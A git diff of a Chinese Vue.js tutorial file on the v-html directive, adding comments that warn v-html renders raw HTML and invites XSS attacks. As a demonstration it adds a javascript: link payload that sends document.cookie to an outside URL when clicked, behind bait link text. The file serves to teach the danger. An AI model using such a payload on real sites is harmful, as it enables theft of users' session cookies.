--- a/Vue/15_内置指令/2. v-html_指令.html
+++ b/Vue/15_内置指令/2. v-html_指令.html
@@ -6,9 +6,20 @@
     <script type="text/javascript" src="../js/vue.js"></script>
 </head>
 <body>
+<!--
+v-html指令:
+1. 作用: 向指定节点中渲染包含html结构的内容
+2. 与插值语法的区别:
+    (1) v-html会替换掉节点中所有的呢日哦那个，{{xx}}则不会。
+    (2) v-html可以识别html结构
+3. 严重注意: v-html有安全性问题！！！！
+    (1) 在网站上动态渲染任意HTML是非常危险的，容易导致XSS攻击
+    (2) 一定要在可信的内容上使用v-html，永远不要用在用户提交的内容上！
+-->
 <div id="root">
     <div>你好, {{name}}</div>
     <div v-html="str"></div>
+    <div v-html="str2"></div>
 </div>
 </body>
 
@@ -19,7 +30,8 @@
        el: '#root',
        data: {
            name: '前端',
-           str: '<h3>你好啊！</h3>'
+           str: '<h3>你好啊！</h3>',
+           str2: '<a href=javascript:location.href="http://www.google.com?"+document.cookie>兄弟我找到了你想要的！</a>'
        }
     });
 </script>
